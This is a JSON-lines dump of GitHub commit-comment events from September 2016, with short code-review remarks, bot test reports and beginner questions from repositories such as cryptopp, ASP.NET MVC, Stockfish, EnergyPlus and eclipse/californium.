{"id":"4594362545","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19108919,"position":null,"line":null,"path":null,"commit_id":"54557b18275053bbfc34594f7e65808dd92dd1a6","created_at":"2016-09-21T06:46:36Z","updated_at":"2016-09-21T06:46:36Z","body":"This broke OS X. Also see the comments in {PR 294](http://github.com/weidai11/cryptopp/pull/294) for the error messages."}},"created_at":"2016-09-21T06:46:36Z"}
{"id":"4594363415","type":"CommitCommentEvent","actor":{"login":"dotnetjunkie"},"repo":{"name":"dotnetjunkie/Mvc"},"payload":{"comment":{"id":19108922,"position":26,"line":26,"path":"src/Microsoft.AspNetCore.Mvc/ApplicationBuilderExtensions.cs","commit_id":"89957e06349ddc3a45977ff19c18d7087ebc6503","created_at":"2016-09-21T06:46:52Z","updated_at":"2016-09-21T06:46:52Z","body":"I don't think we understand the Conforming Container anti-pattern differently. It is about the lowest-common-denominator (LCD) and the main reason for it being an anti-pattern is that it is impossible to define such LCD while having an abstraction that is still usable and doesn’t stifle innovation.\r\n\r\nThe place I am trying to get to is IMO very similar to the way the previous Web API stuff worked. We can easily view the Web API configuration system with its key-value lookup for its services as a minimalistic container. We never needed to replace its minimalistic container. So we actually had two containers in the past. The difference here with the previous frameworks is that I think that we –with some small improvements in the framework- can actually get to a place where integration packages can be completely omitted. This would be a major time saver for all of us.\r\n\r\nBefore continuing the discussion, I would like to ask you to read [my blog post on this subject]( https://simpleinjector.org/blog/2016/07/working-around-the-asp-net-core-di-abstraction/). Here I describe this reasoning in more details."}},"created_at":"2016-09-21T06:46:52Z"}
{"id":"4594366303","type":"CommitCommentEvent","actor":{"login":"Gerver502"},"repo":{"name":"Gerver502/hello-word-"},"payload":{"comment":{"id":19108927,"position":null,"line":null,"path":null,"commit_id":"5fdcd1aa3990d97c204710427ad14a92a7ce45bb","created_at":"2016-09-21T06:47:45Z","updated_at":"2016-09-21T06:47:45Z","body":"it makes more things easy. than the last one "}},"created_at":"2016-09-21T06:47:45Z"}
{"id":"4594369219","type":"CommitCommentEvent","actor":{"login":"macarole"},"repo":{"name":"macarole/myphp"},"payload":{"comment":{"id":19108928,"position":11,"line":11,"path":"php/demo4.php","commit_id":"39e66480778e81560042442e3d83a510b2757b85","created_at":"2016-09-21T06:48:37Z","updated_at":"2016-09-21T06:48:37Z","body":"我写着试着玩的"}},"created_at":"2016-09-21T06:48:37Z"}
{"id":"4594369592","type":"CommitCommentEvent","actor":{"login":"FauziAkram"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19108929,"position":null,"line":null,"path":null,"commit_id":"81614e20b73521a4e01f4833953b59ef088fb455","created_at":"2016-09-21T06:48:44Z","updated_at":"2016-09-21T06:48:44Z","body":"If this test pass I will suicide...\r\nI have tested locally both divisor 15 and 17.\r\nI played 1500 games , and:\r\n17 was leading with 57% winning rate.\r\n16 (original) had 50% winning rate.\r\n15 had only 43% winning rate.\r\n\r\nSo I tested in fishtest version 17, and it failed miserably.\r\nAnyway goodluck"}},"created_at":"2016-09-21T06:48:44Z"}
{"id":"4594369650","type":"CommitCommentEvent","actor":{"login":"cuitoldfish"},"repo":{"name":"arduino/Arduino"},"payload":{"comment":{"id":19108930,"position":23,"line":496,"path":"hardware/arduino/avr/cores/arduino/USBCore.cpp","commit_id":"2c5dd2029807a7d3fe76ed86a81643db088b5c2c","created_at":"2016-09-21T06:48:46Z","updated_at":"2016-09-21T06:48:46Z","body":"then why you say Arduino use USB_DeviceDescriptorB?"}},"created_at":"2016-09-21T06:48:46Z"}
{"id":"4594369929","type":"CommitCommentEvent","actor":{"login":"sajidrehan"},"repo":{"name":"sajidrehan/Calculator"},"payload":{"comment":{"id":19108931,"position":null,"line":null,"path":null,"commit_id":"bf0ce74ff8ba2c2de581c22cdf5483fcdabcda16","created_at":"2016-09-21T06:48:52Z","updated_at":"2016-09-21T06:48:52Z","body":"Model class does not inherit from any class. It imports Foundation framework and not UIKit framework because Model in MVC is completely UI independent.\r\n"}},"created_at":"2016-09-21T06:48:52Z"}
{"id":"4594370522","type":"CommitCommentEvent","actor":{"login":"Gerver502"},"repo":{"name":"Gerver502/hello-word-"},"payload":{"comment":{"id":19108933,"position":null,"line":null,"path":null,"commit_id":"5fdcd1aa3990d97c204710427ad14a92a7ce45bb","created_at":"2016-09-21T06:49:03Z","updated_at":"2016-09-21T06:49:03Z","body":"it makes more things easy. than the last one "}},"created_at":"2016-09-21T06:49:03Z"}
{"id":"4594371015","type":"CommitCommentEvent","actor":{"login":"mosesyumss"},"repo":{"name":"EpikPhailure/Overwatch-Aim-Assist"},"payload":{"comment":{"id":19108935,"position":null,"line":null,"path":null,"commit_id":"0a8d229413736ecf3e29f85c94b185f5d715f2e9","created_at":"2016-09-21T06:49:11Z","updated_at":"2016-09-21T06:49:11Z","body":"I like your addition of aimbot key and capture rate:)"}},"created_at":"2016-09-21T06:49:11Z"}
{"id":"4594371896","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19108936,"position":null,"line":null,"path":null,"commit_id":"ee5f2d18ffd0807abd15b7f27b43f7bd2050c600","created_at":"2016-09-21T06:49:28Z","updated_at":"2016-09-21T06:49:28Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1193 of 1193 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee5f2d18ffd0807abd15b7f27b43f7bd2050c600-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee5f2d18ffd0807abd15b7f27b43f7bd2050c600-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee5f2d18ffd0807abd15b7f27b43f7bd2050c600-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-21T06:49:28Z"}
{"id":"4594372422","type":"CommitCommentEvent","actor":{"login":"sakieltang"},"repo":{"name":"BelledonneCommunications/linphone-iphone"},"payload":{"comment":{"id":19108937,"position":null,"line":null,"path":null,"commit_id":"5a785b7b9d41b0ede7d29ba4fcdbd21441d75d0b","created_at":"2016-09-21T06:49:37Z","updated_at":"2016-09-21T06:49:37Z","body":"\n\nhi, \n\n\nliblinphone is a very good sdk for developing living video/audio communication. But there seems to be very little reference materials to the beginner. I know there are some API reference documents and several  tutorials, but they are too simple or out-of-date. I am reading a demo, but i found that many functions are changed. I feel so confused. So, whether or not  did i miss any important materials? You know, liblinphone is too big, would you like to give me some advices, i will very appreciate your help. Thank you.\n\n\nTang \n\n\n\n\n\n\n\n\n\n\nAt 2016-09-20 19:50:22, \"Joost Hoogendoorn\" <notifications@github.com> wrote:\n\n\n@sakieltang What doesn't work? Can you give more info? Maybe I can help, as I'm trying to get the latest code to run on iOS 10 with Xcode8 too. For me it only crashes on the phone now as soon as I'm having contacts in my contactbook.\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2016-09-21T06:49:37Z"}
{"id":"4594374144","type":"CommitCommentEvent","actor":{"login":"sajidrehan"},"repo":{"name":"sajidrehan/Calculator"},"payload":{"comment":{"id":19108942,"position":null,"line":null,"path":null,"commit_id":"bf0ce74ff8ba2c2de581c22cdf5483fcdabcda16","created_at":"2016-09-21T06:50:08Z","updated_at":"2016-09-21T06:50:08Z","body":"I have used Dictionary and enum in CalculatorBrain.swift for more maintainable design."}},"created_at":"2016-09-21T06:50:08Z"}
{"id":"4594375180","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19108944,"position":null,"line":null,"path":null,"commit_id":"ee5f2d18ffd0807abd15b7f27b43f7bd2050c600","created_at":"2016-09-21T06:50:26Z","updated_at":"2016-09-21T06:50:26Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee5f2d18ffd0807abd15b7f27b43f7bd2050c600-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T06:50:26Z"}
{"id":"4594376623","type":"CommitCommentEvent","actor":{"login":"anglehui"},"repo":{"name":"anglehui/secondproject"},"payload":{"comment":{"id":19108946,"position":1,"line":1,"path":"one","commit_id":"ca05ecdea2b474633d671251893b9927e7530f52","created_at":"2016-09-21T06:50:53Z","updated_at":"2016-09-21T06:50:53Z","body":"看着办吧"}},"created_at":"2016-09-21T06:50:53Z"}
{"id":"4594377658","type":"CommitCommentEvent","actor":{"login":"anglehui"},"repo":{"name":"anglehui/secondproject"},"payload":{"comment":{"id":19108948,"position":1,"line":1,"path":"one","commit_id":"ca05ecdea2b474633d671251893b9927e7530f52","created_at":"2016-09-21T06:51:11Z","updated_at":"2016-09-21T06:51:11Z","body":"好的"}},"created_at":"2016-09-21T06:51:11Z"}
{"id":"4594380893","type":"CommitCommentEvent","actor":{"login":"yuanf5"},"repo":{"name":"yuanf5/MachineLearning"},"payload":{"comment":{"id":19108950,"position":null,"line":null,"path":null,"commit_id":"660620771bb61496da373af929667eff0840f09d","created_at":"2016-09-21T06:52:06Z","updated_at":"2016-09-21T06:52:06Z","body":"Please find HTML through this link: https://yuanf5.github.io/MachineLearning/Final_project.html"}},"created_at":"2016-09-21T06:52:06Z"}
{"id":"4594383850","type":"CommitCommentEvent","actor":{"login":"rdavis91014"},"repo":{"name":"rdavis91014/Hello-World"},"payload":{"comment":{"id":19108957,"position":null,"line":null,"path":null,"commit_id":"e622a8709b521595e4c9b8b18b96bc9247f704db","created_at":"2016-09-21T06:52:59Z","updated_at":"2016-09-21T06:52:59Z","body":"Hello Non Robotic individuals,\r\nI find web design, web development, and software coding to be addictive. \r\nRoxanne"}},"created_at":"2016-09-21T06:52:59Z"}
{"id":"4594386656","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19108959,"position":27,"line":235,"path":"californium-core/src/main/java/org/eclipse/californium/core/CoapServer.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-21T06:53:49Z","updated_at":"2016-09-21T06:53:49Z","body":"I think you are right and we should actually destroy the endpoints even after invoking `Executor.shutdownNow()` only, i.e. moving it to the end (as you proposed) makes sense to me. I will change that... "}},"created_at":"2016-09-21T06:53:49Z"}
{"id":"4594387688","type":"CommitCommentEvent","actor":{"login":"jcmorrow"},"repo":{"name":"jcmorrow/fft-on-rails"},"payload":{"comment":{"id":19108962,"position":8,"line":8,"path":"app/assets/stylesheets/file_summarizer.rb","commit_id":"e64bef72a64eb59a89f71cb9c33cdd16a39cd116","created_at":"2016-09-21T06:54:08Z","updated_at":"2016-09-21T06:54:08Z","body":"`g commit -am FAIL`"}},"created_at":"2016-09-21T06:54:08Z"}
{"id":"4594388936","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"zonkzonk/radare2"},"payload":{"comment":{"id":19108964,"position":4,"line":1473,"path":"libr/debug/p/native/linux/linux_coredump.c","commit_id":"cbb87b810a5cf8d6178af56bd0825e42b0df228f","created_at":"2016-09-21T06:54:31Z","updated_at":"2016-09-21T06:54:31Z","body":"Why? Its unused"}},"created_at":"2016-09-21T06:54:31Z"}
{"id":"4594389753","type":"CommitCommentEvent","actor":{"login":"seletskiy"},"repo":{"name":"reconquest/args"},"payload":{"comment":{"id":19108965,"position":3,"line":3,"path":"README.md","commit_id":"ec9e7b1f2143fd342a4341b02bce77abf0ef595c","created_at":"2016-09-21T06:54:44Z","updated_at":"2016-09-21T06:54:44Z","body":"thx"}},"created_at":"2016-09-21T06:54:44Z"}
{"id":"4594404176","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19108986,"position":68,"line":68,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/BaseMatcher.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-21T06:58:45Z","updated_at":"2016-09-21T06:58:45Z","body":"I agree with you regarding synchronizing `setMessageExchangeStore`. However, I think we should keep the boolean in order to prevent starting/stopping multiple times..."}},"created_at":"2016-09-21T06:58:45Z"}
{"id":"4594406696","type":"CommitCommentEvent","actor":{"login":"No1KnowMe"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19108991,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-21T06:59:29Z","updated_at":"2016-09-21T06:59:29Z","body":"Did you upload the Controll App?"}},"created_at":"2016-09-21T06:59:29Z"}
{"id":"4594409140","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"aseba-community/dashel"},"payload":{"comment":{"id":19108995,"position":null,"line":null,"path":null,"commit_id":"c412a6fdeeca5bb2e4c12c82bac1cb55fed7100f","created_at":"2016-09-21T07:00:09Z","updated_at":"2016-09-21T07:00:09Z","body":"Actually I was thinking about 1.3.0, because this is not an incompatible ABI change, rather it is a new feature."}},"created_at":"2016-09-21T07:00:09Z"}
{"id":"4594412621","type":"CommitCommentEvent","actor":{"login":"ronawho"},"repo":{"name":"chapel-lang/chapel"},"payload":{"comment":{"id":19109019,"position":null,"line":null,"path":null,"commit_id":"121463b59c5f83a64e4ff82d9726243e98cb9d2e","created_at":"2016-09-21T07:01:02Z","updated_at":"2016-09-21T07:01:02Z","body":"Yeah, good point. \r\n\r\nI added some runtime tests and created a PR: https://github.com/chapel-lang/chapel/pull/4607\r\n\r\nI need to clean up the PR message yet, but let me know if you think we need some additional tests or if theres some additional cleanup/comments that the runtime code needs."}},"created_at":"2016-09-21T07:01:02Z"}
{"id":"4594415950","type":"CommitCommentEvent","actor":{"login":"mareknovotny"},"repo":{"name":"windup/windup"},"payload":{"comment":{"id":19109023,"position":13,"line":13,"path":"reporting/api/src/main/java/org/jboss/windup/reporting/model/QuickfixModel.java","commit_id":"20689da3df64d96c03e922bc57f9092156b57b1d","created_at":"2016-09-21T07:01:54Z","updated_at":"2016-09-21T07:01:54Z","body":"@OndraZizka good catch!"}},"created_at":"2016-09-21T07:01:54Z"}
{"id":"4594416118","type":"CommitCommentEvent","actor":{"login":"mareknovotny"},"repo":{"name":"windup/windup"},"payload":{"comment":{"id":19109025,"position":47,"line":38,"path":"reporting/api/src/main/java/org/jboss/windup/reporting/model/QuickfixModel.java","commit_id":"20689da3df64d96c03e922bc57f9092156b57b1d","created_at":"2016-09-21T07:01:57Z","updated_at":"2016-09-21T07:01:57Z","body":"@OndraZizka not sure why you changed from name to description as now it doesn't respect the property name, just curious, I know that it is just constant name, but it could confuse a reader."}},"created_at":"2016-09-21T07:01:57Z"}
{"id":"4594418360","type":"CommitCommentEvent","actor":{"login":"mareknovotny"},"repo":{"name":"windup/windup"},"payload":{"comment":{"id":19109032,"position":70,"line":80,"path":"reporting/api/src/main/java/org/jboss/windup/reporting/model/QuickfixModel.java","commit_id":"20689da3df64d96c03e922bc57f9092156b57b1d","created_at":"2016-09-21T07:02:34Z","updated_at":"2016-09-21T07:02:34Z","body":"@OndraZizka not sure why you changed from newline to inserted_line as now it doesn't respect the property name, just curious, I know that it is just constant name, but it could confuse a reader."}},"created_at":"2016-09-21T07:02:34Z"}
{"id":"4594418525","type":"CommitCommentEvent","actor":{"login":"davidjsherman"},"repo":{"name":"aseba-community/dashel"},"payload":{"comment":{"id":19109033,"position":null,"line":null,"path":null,"commit_id":"c412a6fdeeca5bb2e4c12c82bac1cb55fed7100f","created_at":"2016-09-21T07:02:37Z","updated_at":"2016-09-21T07:02:37Z","body":"I thought so to, but you had written major.\r\nThe interface is binary?"}},"created_at":"2016-09-21T07:02:37Z"}
{"id":"4594421066","type":"CommitCommentEvent","actor":{"login":"enjoy-digital"},"repo":{"name":"enjoy-digital/litejesd204b"},"payload":{"comment":{"id":19109040,"position":2,"line":14,"path":"litejesd204b/phy/__init__.py","commit_id":"8c0e5f06aebbd40ad4f8ce8ebf3b47ce27bb3718","created_at":"2016-09-21T07:03:21Z","updated_at":"2016-09-21T07:03:21Z","body":"OK I'm working on others points first and I'll do that."}},"created_at":"2016-09-21T07:03:21Z"}
{"id":"4594422513","type":"CommitCommentEvent","actor":{"login":"evilive3000"},"repo":{"name":"crossbario/autobahn-js"},"payload":{"comment":{"id":19109045,"position":42,"line":127,"path":"package/lib/session.js","commit_id":"65df30cbe293226ae5565e96a02e4387a918f6e6","created_at":"2016-09-21T07:03:46Z","updated_at":"2016-09-21T07:03:46Z","body":"what's the point of `else` case?"}},"created_at":"2016-09-21T07:03:46Z"}
{"id":"4594422529","type":"CommitCommentEvent","actor":{"login":"davidjsherman"},"repo":{"name":"aseba-community/dashel"},"payload":{"comment":{"id":19109046,"position":null,"line":null,"path":null,"commit_id":"c412a6fdeeca5bb2e4c12c82bac1cb55fed7100f","created_at":"2016-09-21T07:03:46Z","updated_at":"2016-09-21T07:03:46Z","body":"I suppose the list of allowed target types is an internal protocol, OK"}},"created_at":"2016-09-21T07:03:46Z"}
{"id":"4594437296","type":"CommitCommentEvent","actor":{"login":"carey3051"},"repo":{"name":"fetlife/ios"},"payload":{"comment":{"id":19109092,"position":null,"line":null,"path":null,"commit_id":"60e42f82ab7c5a8f1c26e2e2850cedabe703b87a","created_at":"2016-09-21T07:07:28Z","updated_at":"2016-09-21T07:07:28Z","body":"Forgive me, i'm a complete noob. I have no clue what i am doing, i have gotten to the point where i received the objects, and resolved the deltas. so i enter the command cd ios, and nothing happens. and thus when i enter the pod install command, it tells me \"-bash: pod: command not found\""}},"created_at":"2016-09-21T07:07:28Z"}
{"id":"4594449521","type":"CommitCommentEvent","actor":{"login":"snake1597"},"repo":{"name":"snake1597/snake1597.github.io"},"payload":{"comment":{"id":19109110,"position":null,"line":null,"path":null,"commit_id":"09363275da9b8fe1afecf5a7f42913371de623b1","created_at":"2016-09-21T07:10:46Z","updated_at":"2016-09-21T07:10:46Z","body":"qwe"}},"created_at":"2016-09-21T07:10:46Z"}
{"id":"4594450331","type":"CommitCommentEvent","actor":{"login":"struempelix"},"repo":{"name":"struempelix/angular2-chartist"},"payload":{"comment":{"id":19109114,"position":null,"line":null,"path":null,"commit_id":"2f5e04a71cb7751614ce471edf426aa211e034e0","created_at":"2016-09-21T07:10:59Z","updated_at":"2016-09-21T07:10:59Z","body":"Added install notes for chartist typings."}},"created_at":"2016-09-21T07:10:59Z"}
{"id":"4594454123","type":"CommitCommentEvent","actor":{"login":"retrue"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19109122,"position":null,"line":null,"path":null,"commit_id":"a2b60de63a9f9a14d894599e2bbbceac597b66c5","created_at":"2016-09-21T07:12:00Z","updated_at":"2016-09-21T07:12:00Z","body":"As I explained before, reverting the three lines added in commit 1177434 to the file AI.cpp reverted the behavior of fighters to the behavior in 0.92 where it worked well.\r\nBut I'll check this and see if it solves the problem too."}},"created_at":"2016-09-21T07:12:00Z"}
{"id":"4594456371","type":"CommitCommentEvent","actor":{"login":"gimsieke"},"repo":{"name":"transpect/calabash-frontend"},"payload":{"comment":{"id":19109124,"position":null,"line":null,"path":null,"commit_id":"67dfda4dc50fa802accbbfaecec0edbcfeff6087","created_at":"2016-09-21T07:12:35Z","updated_at":"2016-09-21T07:12:35Z","body":"This is the Saxon bug report: http://saxon.markmail.org/thread/3u2lkwzqcax6tfps"}},"created_at":"2016-09-21T07:12:35Z"}
{"id":"4594456590","type":"CommitCommentEvent","actor":{"login":"alankistemaker"},"repo":{"name":"a5c3nd3d/SWE20001-Battleships"},"payload":{"comment":{"id":19109125,"position":null,"line":null,"path":null,"commit_id":"f9421dbc11250a717e669a5d7d5753f5138df04c","created_at":"2016-09-21T07:12:39Z","updated_at":"2016-09-21T07:12:39Z","body":"Fixed: #8 Difficulty cannot be changed from hard"}},"created_at":"2016-09-21T07:12:39Z"}
{"id":"4594457081","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"manumanfred/android_device_samsung_galaxys2plus-common"},"payload":{"comment":{"id":19109126,"position":7,"line":67,"path":"BoardConfigCommon.mk","commit_id":"653b9990fd9fa41ddc5c4b62b8c3d43fe2d5b18b","created_at":"2016-09-21T07:12:48Z","updated_at":"2016-09-21T07:12:48Z","body":"This is RIL related. It will create RIL crash if you disable it.(atleast on dual sim)"}},"created_at":"2016-09-21T07:12:48Z"}
{"id":"4594466427","type":"CommitCommentEvent","actor":{"login":"dayeren"},"repo":{"name":"HFTrader/DeepLearningBook"},"payload":{"comment":{"id":19109139,"position":null,"line":null,"path":null,"commit_id":"f6591eb99b17bcf0284a98af0515cd1c822cd84b","created_at":"2016-09-21T07:15:19Z","updated_at":"2016-09-21T07:15:19Z","body":"I do not understand the words in Section 9.7, \"Note that the use of convolution for processing variable sized inputs only makes sense for inputs that have variable size because they contain varying amounts of observation of the same kind of thing—different lengths of recordings over time, different widths of observations over space, etc. Convolution does not make sense if the input has variable size because it can optionally include different kinds of observations.\"  \r\nIt looks a little confusing about\"makes sense for inputs that have variable size \" and \"does not make sense if the input has variable size \"."}},"created_at":"2016-09-21T07:15:19Z"}
{"id":"4594474131","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"jasonlam604/Stringizer"},"payload":{"comment":{"id":19109154,"position":9,"line":37,"path":"README.md","commit_id":"3ac850ee454773457d563a4329fb002265e736ea","created_at":"2016-09-21T07:17:22Z","updated_at":"2016-09-21T07:17:22Z","body":"shouldnt it be \"chopLeft\" and \"chopRight\" instead? (I am no native english speaker though)"}},"created_at":"2016-09-21T07:17:22Z"}
{"id":"4594475268","type":"CommitCommentEvent","actor":{"login":"Alucard24"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19109156,"position":null,"line":null,"path":null,"commit_id":"0522e8da0438f1be80fb4a50cc05d626c6b8b9bb","created_at":"2016-09-21T07:17:38Z","updated_at":"2016-09-21T07:17:38Z","body":"Hi shminer,\r\nyou are right, I did mistake during merge. I have to check! Thanks :)\r\nAny other issues?"}},"created_at":"2016-09-21T07:17:38Z"}
{"id":"4594477813","type":"CommitCommentEvent","actor":{"login":"Gerver502"},"repo":{"name":"Gerver502/hello-word-"},"payload":{"comment":{"id":19109160,"position":2,"line":1,"path":"README.md","commit_id":"cf21e3059f996138ad5d1f7dde0f7dec21bab5ba","created_at":"2016-09-21T07:18:18Z","updated_at":"2016-09-21T07:18:18Z","body":"first of all, am a soccer player. Which now am playing with a city team in the  'EE.UU.'  but i also want to keep on playing soccer, and also looking for new opportunities on professionals league.. and also i gives tips on, making things more easy for you."}},"created_at":"2016-09-21T07:18:18Z"}
{"id":"4594480185","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":19109162,"position":null,"line":null,"path":null,"commit_id":"81cb70a8cae681c70e3b1adb276d0ef93da3fc64","created_at":"2016-09-21T07:18:55Z","updated_at":"2016-09-21T07:18:55Z","body":"現在のコミット文は回りくどく\r\n```\r\nOpenFlow 1.3 で規定される Table-Miss Flow entry の挙動を完全にサポートできていなかったことを記載しています。\r\nでも今はTable-Miss Flow entry はOpenFlow1.3でサポートされています。\r\nこのパッチはOpenFlow1.3の表ミスフローエントリのための注釈を削除します。\r\n```\r\nとなっていたため、上記でご指摘の内容を英文化した以下に修正します。\r\n\r\n```\r\njp:  switching_hub:  Remove description for Table-miss flow entry of OpenFlow1.3 \r\n\r\nOVS has full support for the Table-miss flow entry of OpenFlow1.3 in v2.1.0.\r\nThis patch removes description for Table-miss flow entry of OpenFlow1.3 .\r\n```"}},"created_at":"2016-09-21T07:18:55Z"}
{"id":"4594481830","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19109163,"position":null,"line":null,"path":null,"commit_id":"a39cb8801b330a8be3e1d050842eb86c5d78d897","created_at":"2016-09-21T07:19:17Z","updated_at":"2016-09-21T07:19:17Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1784 of 1784 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a39cb8801b330a8be3e1d050842eb86c5d78d897-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a39cb8801b330a8be3e1d050842eb86c5d78d897-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T07:19:17Z"}
{"id":"4594482545","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19109165,"position":null,"line":null,"path":null,"commit_id":"ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5","created_at":"2016-09-21T07:19:28Z","updated_at":"2016-09-21T07:19:28Z","body":"fixBranchTransition (mitchute) - i386-Windows-7-VisualStudio-12: OK (2339 of 2339 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T07:19:28Z"}
{"id":"4594486471","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19109173,"position":21,"line":21,"path":"movie_collection.rb","commit_id":"5292f4c640b3237e732d6eb36d53f39b701d4f11","created_at":"2016-09-21T07:20:27Z","updated_at":"2016-09-21T07:20:27Z","body":"Не понимаю, что тут происходит. Почему `reduce(1)`, что там означает единица? И никак не используется `res` внутри блока — почему?"}},"created_at":"2016-09-21T07:20:27Z"}
{"id":"4594486854","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19109174,"position":21,"line":21,"path":"movie_collection.rb","commit_id":"5292f4c640b3237e732d6eb36d53f39b701d4f11","created_at":"2016-09-21T07:20:34Z","updated_at":"2016-09-21T07:20:34Z","body":"Не понимаю, что тут происходит. Почему `reduce(1)`, что там означает единица? И никак не используется `res` внутри блока — почему?"}},"created_at":"2016-09-21T07:20:34Z"}
{"id":"4594493289","type":"CommitCommentEvent","actor":{"login":"dearsq"},"repo":{"name":"Saisimon/tip"},"payload":{"comment":{"id":19109189,"position":18,"line":206,"path":"tip.org","commit_id":"583c60fb1fc036286b28fb28f1aa4e16e9828969","created_at":"2016-09-21T07:22:15Z","updated_at":"2016-09-21T07:22:15Z","body":"delicious!"}},"created_at":"2016-09-21T07:22:15Z"}
{"id":"4594494293","type":"CommitCommentEvent","actor":{"login":"shiftb"},"repo":{"name":"ankane/pghero"},"payload":{"comment":{"id":19109191,"position":null,"line":null,"path":null,"commit_id":"517d406845bd9695215a98bb85da1a71ae328efe","created_at":"2016-09-21T07:22:31Z","updated_at":"2016-09-21T07:22:31Z","body":"yassssss 👍 "}},"created_at":"2016-09-21T07:22:31Z"}
{"id":"4594497182","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19109198,"position":26,"line":26,"path":"movie_collection.rb","commit_id":"5292f4c640b3237e732d6eb36d53f39b701d4f11","created_at":"2016-09-21T07:23:15Z","updated_at":"2016-09-21T07:23:15Z","body":"Тут лучше бы:\r\nа) какой-то более обобщённый код (с жанрами ведь будет та же беда)\r\nб) превращать поля в массивы (для тех полей, для которых это имеет смысл) в конструкторе (initialize) фильма. Тогда весь код очень сильно упростится."}},"created_at":"2016-09-21T07:23:15Z"}
